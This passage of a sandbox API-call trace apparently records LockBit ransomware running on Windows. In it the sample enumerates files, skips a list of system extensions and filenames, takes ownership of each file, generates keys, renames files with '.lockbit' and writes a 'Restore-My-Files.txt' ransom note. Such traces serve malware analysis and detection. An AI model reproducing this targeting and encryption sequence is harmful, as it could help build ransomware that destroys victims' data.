hTemplateFile=0x0) returned 0xffffffff [0093.409] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.411] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.411] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.412] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.413] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.413] RtlFreeAnsiString (AnsiString="\\") [0093.413] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0093.413] malloc (_Size=0x200) returned 0x77d800 [0093.413] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.413] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.413] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.413] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.414] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.414] CloseHandle (hObject=0x13dc) returned 1 [0093.414] free (_Block=0x77d800) [0093.415] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0093.415] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.415] malloc (_Size=0x40068) returned 0x3eb0158 [0093.417] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x3eb0170 | out: lpFileSize=0x3eb0170*=205220) returned 1 [0093.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ef018c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ef018c) returned 0x0 [0093.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ef019c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ef019c) returned 0x0 [0093.422] ReadFile (in: hFile=0x13dc, lpBuffer=0x3eb018c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0158 | out: lpBuffer=0x3eb018c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0158) returned 1 [0093.434] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.434] malloc (_Size=0xb8) returned 0x3e70008 [0093.434] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x3e70008, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0093.435] free (_Block=0x3e70008) [0093.435] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.435] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.435] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.435] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725d14e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725d14e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMainMask.wmv", cAlternateFileName="")) returned 1 [0093.435] lstrcmpiW (lpString1=".", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.435] lstrcmpiW (lpString1="..", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.435] PathFindExtensionW (pszPath="TravelIntroToMainMask.wmv") returned=".wmv" [0093.435] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.436] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.437] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.437] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] lstrcmpiW (lpString1="ntldr", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] lstrcmpiW (lpString1="autorun.inf", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] lstrcmpiW (lpString1="thumbs.db", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] lstrcmpiW (lpString1="iconcache.db", lpString2="TravelIntroToMainMask.wmv") returned -1 [0093.438] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.438] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv") returned=".wmv" [0093.438] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.438] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.438] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.439] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.439] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv.lockbit") returned 85 [0093.439] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.441] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.442] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.442] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.443] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.444] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.444] RtlFreeAnsiString (AnsiString="\\") [0093.444] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0093.445] malloc (_Size=0x200) returned 0x77d800 [0093.445] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.445] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.445] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.445] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.446] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.446] CloseHandle (hObject=0x11a0) returned 1 [0093.446] free (_Block=0x77d800) [0093.446] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0093.446] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.446] malloc (_Size=0x40068) returned 0x3ef01c8 [0093.448] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x3ef01e0 | out: lpFileSize=0x3ef01e0*=61220) returned 1 [0093.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f301fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f301fc) returned 0x0 [0093.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3020c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3020c) returned 0x0 [0093.454] ReadFile (in: hFile=0x11a0, lpBuffer=0x3ef01fc, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef01c8 | out: lpBuffer=0x3ef01fc*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef01c8) returned 1 [0093.489] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.489] malloc (_Size=0xc0) returned 0x77d800 [0093.489] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0093.490] free (_Block=0x77d800) [0093.490] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.490] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.490] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.490] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMainMask_PAL.wmv", cAlternateFileName="")) returned 1 [0093.490] lstrcmpiW (lpString1=".", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.490] lstrcmpiW (lpString1="..", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.491] PathFindExtensionW (pszPath="TravelIntroToMainMask_PAL.wmv") returned=".wmv" [0093.491] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.491] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.492] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.492] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] lstrcmpiW (lpString1="ntldr", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] lstrcmpiW (lpString1="bootsect.bak", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] lstrcmpiW (lpString1="autorun.inf", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] lstrcmpiW (lpString1="thumbs.db", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] lstrcmpiW (lpString1="iconcache.db", lpString2="TravelIntroToMainMask_PAL.wmv") returned -1 [0093.493] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.493] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned=".wmv" [0093.493] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.493] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.493] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.494] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.494] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv.lockbit") returned 89 [0093.494] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.496] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.498] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.162] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.165] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.166] RtlFreeAnsiString (AnsiString="\\") [0095.166] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1e8) returned 0x0 [0095.166] malloc (_Size=0x200) returned 0x77d800 [0095.166] NtQueryInformationToken (in: TokenHandle=0x1e8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.166] InitializeSecurityDescriptor 